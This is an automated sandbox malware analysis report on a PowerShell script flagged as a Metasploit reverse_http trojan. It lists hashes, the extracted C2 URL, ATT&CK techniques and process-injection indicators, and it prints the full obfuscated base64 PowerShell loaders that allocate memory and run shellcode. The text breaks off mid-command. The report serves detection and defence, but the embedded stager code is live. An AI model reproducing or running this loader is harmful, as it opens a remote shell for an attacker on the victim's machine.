metasploit | 405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431

General

Target

ps1004.ps1
Size

8KB
MD5

1195ad87cfc060272b60133c613b928e
SHA1

d6325814107fd10ba6f63a11ecb5b796553b291b
SHA256

405f7c89ba1cfa0a548c40dff89d003a06d6ad6fa8fa50bcd37f83cfc9bfa431
SHA512

f0609f25c9c95cb6ec6419e6c93332731a621243a02416c4f15b0edcbf7ffc12382c08cd5a65a9fc765b62cb2e8967ca7edee027e726b061d139615588489199
SSDEEP

96:zCTRX/T7Dh9pPKZT3Aasj0AwCATxuc23s5GeaWy7V1Xf4ymxtgqkfuaMk09clOm:zaF7Dh/PO3AaI2LxUlC5xtgqkfhMzcOm

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://192.168.18.129:8080/UY2jjW-iTdaTLZIs9Bq1pQ1u1z9L8

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4500	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4500	powershell.exe
4500	powershell.exe
208	powershell.exe
208	powershell.exe
2188	powershell.exe
2188	powershell.exe
2284	powershell.exe
2284	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4500 wrote to memory of 208	4500	powershell.exe	84
PID 4500 wrote to memory of 208	4500	powershell.exe	84
PID 208 wrote to memory of 2188	208	powershell.exe	85
PID 208 wrote to memory of 2188	208	powershell.exe	85
PID 2188 wrote to memory of 2284	2188	powershell.exe	86
PID 2188 wrote to memory of 2284	2188	powershell.exe	86
PID 2188 wrote to memory of 2284	2188	powershell.exe	86
PID 2284 wrote to memory of 4616	2284	powershell.exe	92
PID 2284 wrote to memory of 4616	2284	powershell.exe	92
PID 2284 wrote to memory of 4616	2284	powershell.exe	92
PID 4616 wrote to memory of 4980	4616	csc.exe	93
PID 4616 wrote to memory of 4980	4616	csc.exe	93
PID 4616 wrote to memory of 4980	4616	csc.exe	93

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ps1004.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv FDG -;sv Q ec;sv ZzY ((gv FDG).value.toString()+(gv Q).value.toString());powershell (gv ZzY).value.toString() 'JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUALAAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGUANwAsADAAeAA5AGYALAAwAHgANQA3ACwAMAB4AGUAMQAsADAAeAAxADcALAAwAHgAYQBhACwAMAB4ADQANwAsADAAeAAxADYALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABmADIALAAwAHgAMgA0ACwAMAB4AGMANQAsADAAeABkADUALAAwAHgANAA5ACwAMAB4ADEANAAsADAAeAA0ADAALAAwAHgAZQA5ACwAMAB4ADYANAAsADAAeAAzADMALAAwAHgAMgBkACwAMAB4ADcAZAAsADAAeAA4ADYALAAwAHgAZAA0ACwAMAB4AGEAZAAsADAAeAA3AGQALAAwAHgAZQBlACwAMAB4AGQANAAsADAAeABhAGQALAAwAHgAMwBkACwAMAB4AGUAZQAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4AGUANQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4AGYAMwAsADAAeABlADkALAAwAHgANAA3ACwAMAB4AGUAOAAsADAAeABhADgALAAwAHgANAA2ACwAMAB4AGUAZQAsADAAeABlADgALAAwAHgAMQA4ACwAMAB4ADAAMQAsADAAeABmADAALAAwAHgAZAA2ACwAMAB4AGEANgAsADAAeABkADEALAAwAHgAYQAzACwAMAB4ADQAMAAsADAAeABjAGYALAAwAHgAYwAzACwAMAB4AGQANQAsADAAeABlADQALAAwAHgAZQBkACwAMAB4ADEAYgAsADAAeAAwAGMALAAwAHgANwAzACwAMAB4ADMAMQAsADAAeAA5ADcALAAwAHgANgAzACwAMAB4AGYANwAsADAAeABiADUALAAwAHgANQA5ACwAMAB4AGIAOAAsADAAeAA4AGQALAAwAHgANwBhACwAMAB4ADIAYwAsADAAeABkAGIALAAwAHgAZAA2ACwAMAB4AGIAOQAsADAAeAA5ADAALAAwAHgAYwBiACwAMAB4ADgAZQAsADAAeABjADIALAAwAHgAZAAwACwAMAB4AGYANAAsADAAeAA2ADAALAAwAHgAMAA0ACwAMAB4ADEAZAAsADAAeAAyADQALAAwAHgAYgAyACwAMAB4ADQAMAAsADAAeAA1ADkALAAwAHgAMQA2ACwAMAB4ADgANQAsADAAeAA5ADQALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABkADcALAAwAHgAZABkACwAMAB4AGMANwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdQBTAGwAawA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBTAGwAawAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdQBTAGwAawAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEYAcwBzACkAKQA7ACQAWgBmAEUAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBXAG0AIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAZQBXAG0AIAAkAFoAZgBFACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAFoAZgBFACAAJABlACIAOwB9AA=='"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAHMAcwAgAD0AIAAnACQAcwB1AGsAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwB1AGsAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQANQAsADAAeABiAGEALAAwAHgANAA3ACwAMAB4ADUAZgAsADAAeAA3ADkALAAwAHgANgA3ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADIALAAwAHgAYQAzACwAMAB4ADkAMQAsADAAeABlADgALAAwAHgAMwBjACwAMAB4ADUAYwAsADAAeAA2ADIALAAwAHgAOQA3ACwAMAB4ADAAZAAsADAAeAA4AGUALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4ADQAYwAsADAAeABiADAALAAwAHgAYgAzACwAMAB4AGQANQAsADAAeAAwADAALAAwAHgAMgAxACwAMAB4ADQAMgAsADAAeAAwAGMALAAwAHgAOQA1ACwAMAB4AGIANgAsADAAeABkAGYALAAwAHgAYgBkACwAMAB4AGYAZQAsADAAeAA0ADcALAAwAHgANgA4ACwAMAB4ADAAYgAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUANgAsADAAeAAyADAALAAwAHgAMQA5ACwAMAB4AGUAOAAsADAAeAAyAGEALAAwAHgAMwBiACwAMAB4ADQAZQAsADAAeABjAGEALAAwAHgAMQAzACwAMAB4AGYANAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANAAsADAAeAA0ADIALAAwAHgAZQA5ACwAMAB4AGUANAAsADAAeAAwADgALAAwAHgAMAAyACwAMAB4ADkAYQAsADAAeABhADkALAAwAHgAYgBjACwAMAB4ADIANwAsADAAeABkAGUALAAwAHgANwAxACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgANQA0ACwAMAB4AGMAOQAsADAAeABjADUALAAwAHgAOAAyACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgANwA5ACwAMAB4ADgAYwAsADAAeABmAGIALAAwAHgANgBmACwAMAB4ADAAYQAsADAAeABjADYALAAwAHgAZQAzACwAMAB4ADAANAAsADAAeAA1ADQALAAwAHgAZgA3ACwAMAB4ADEAMgAsADAAeABjADgALAAwAHgAZQAxACwAMAB4ADMAZQAsADAAeAA2ADAALAAwAHgAZAAyACwAMAB4AGEAMAAsADAAeAA0AGIALAAwAHgAYgBkACwAMAB4AGEAMQAsADAAeAAwADMALAAwAHgAYgAzACwAMAB4AGIAZgAsADAAeAA2ADMALAAwAHgANQAyACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgANAA0ACwAMAB4ADkAOQAsADAAeABhADcALAAwAHgAOAAzACwAMAB4ADkAYwAsADAAeAA5ADkALAAwAHgANQA3ACwAMAB4AGYANgAsADAAeABkADYALAAwAHgAZABhACwAMAB4AGUAYQAsADAAeAAwADEALAAwAHgAMgBkACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOAA3ACwAMAB4AGIAMgAsADAAeAAwADEALAAwAHgAYgAyACwAMAB4ADMAZgAsADAAeAAxADcALAAwAHgAYgAwACwAMAB4ADEANwAsADAAeABkADkALAAwAHgAZABjACwAMAB4AGIAZQAsADAAeABkAGMALAAwAHgAYQBkACwAMAB4AGIAYgAsADAAeABhADIALAAwAHgAZQAzACwAMAB4ADYAMgAsADAAeABiADAALAAwAHgAZABlACwAMAB4ADYAOAAsADAAeAA4ADUALAAwAHgAMQA3ACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgAYQAyACwAMAB4AGIAMwAsADAAeAAzAGMALAAwAHgAZQA4ACwAMAB4AGMAYgAsADAAeABlADIALAAwAHgAOQA4ACwAMAB4ADUAZgAsADAAeABmADMALAAwAHgAZgA1ACwAMAB4ADQANAAsADAAeAAzAGYALAAwAHgANQAxACwAMAB4ADcAZAAsADAAeAA2ADYALAAwAHgANQA2ACwAMAB4AGUANQAsADAAeAA3AGUALAAwAHgANwA5ACwAMAB4ADUANwAsADAAeABiAGIALAAwAHgAZQA4ACwAMAB4AGUAYgAsADAAeABjAGQALAAwAHgAMwAwACwAMAB4AGUAOQAsADAAeAA5AGIALAAwAHgANwBhACwAMAB4AGQAMAAsADAAeAA4ADcALAAwAHgAMwAyACwAMAB4AGQAMQAsADAAeAA0AGEALAAwAHgAMQA0ACwAMAB4AGIAMwAsADAAeABmAGYALAAwAHgAOABkACwAMAB4ADUAYgAsADAAeABlAGUALAAwAHgAMwAxACwAMAB4ADQAOQAsADAAeABmADAALAAwAHgANAAzACwAMAB4ADYAMQAsADAAeAAzAGUALAAwAHgAYQA0ACwAMAB4ADAAYgAsADAAeABiAGYALAAwAHgAOQA2ACwAMAB4ADMAMwAsADAAeAA2AGMALAAwAHgANAAwACwAMAB4AGMAMwAsADAAeAA5ADcALAAwAHgAMgAxACwAMAB4AGQANQAsADAAeABlAGYALAAwAHgANAA0ACwAMAB4ADkANgAsADAAeAA0ADEALAAwAHgANgAwACwAMAB4ADcANQAsADAAeAAxADgALAAwAHgAOQAyACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgAMQA0ACwAMAB4ADQAZAAsADAAeABjAGIALAAwAHgANQBhACwAMAB4ADAAMAAsADAAeAAwADcALAAwAHgAYgBjACwAMAB4AGIANwAsADAAeABiAGQALAAwAHgAOAAzACwAMAB4ADIANgAsADAAeABhADkALAAwAHgANgA5ACwAMAB4ADYANwAsADAAeABmAGQALAAwAHgANgAwACwAMAB4AGUAMQAsADAAeAA0AGUALAAwAHgANAAzACwAMAB4ADAAMgAsADAAeAAzADQALAAwAHgAYwAwACwAMAB4ADEAMgAsADAAeABkADUALAAwAHgANAAzACwAMAB4ADEAMQAsADAAeABlAGYALAAwAHgAMgBjACwAMAB4AGUAMAAsADAAeAA2ADkALAAwAHgAMABmACwAMAB4ADEAZgAsADAAeAA5ADAALAAwAHgAZABlACwAMAB4ADgANgAsADAAeAAwADAALAAwAHgAYQA2ACwAMAB4ADEAZgAsADAAeAA0AGQALAAwAHgAYgA3ACwAMAB4AGUAMQAsADAAeAA4AGMALAAwAHgAMAA2ACwAMAB4AGMAOAAsADAAeABkAGYALAAwAHgAZABhACwAMAB4ADUAMwAsADAAeAA5AGIALAAwAHgANABjACwAMAB4ADQAOQAsADAAeAAwAGIALAAwAHgANABmACwAMAB4ADIANQAsADAAeAAwADUALAAwAHgANQA4ACwAMAB4ADMAYQAsADAAeABlADcALAAwAHgAZQBlACwAMAB4ADYAMQAsADAAeAAxADAALAAwAHgANgAxACwAMAB4ADcAYQAsADAAeAA5ADQALAAwAHgAYwA0ACwAMAB4AGUANgAsADAAeABmAGEALAAwAHgAOQBiACwAMAB4AGYAYQAsADAAeABmADYALAAwAHgANwAzACwAMAB4ADMAYgAsADAAeAA5ADAALAAwAHgAZgAyACwAMAB4AGQAMwAsADAAeABkADYALAAwAHgANwBhACwAMAB4AGEAZAAsADAAeABiAGIALAAwAHgANQAzACwAMAB4AGMAMwAsADAAeABjAGYALAAwAHgAYgBkACwAMAB4ADYAMwAsADAAeAAxAGUALAAwAHgAYgBjACwAMAB4ADkAMgAsADAAeABjADgALAAwAHgAZgAyACwAMAB4ADEANQAsADAAeAA3AGMALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA4ADEALAAwAHgAMAA3ACwAMAB4AGUAMwAsADAAeAAyAGUALAAwAHgAMwA0ACwAMAB4ADMANwAsADAAeAA2AGUALAAwAHgAYwA3ACwAMAB4ADUAZgAsADAAeAAzAGYALAAwAHgAOAAyACwAMAB4AGU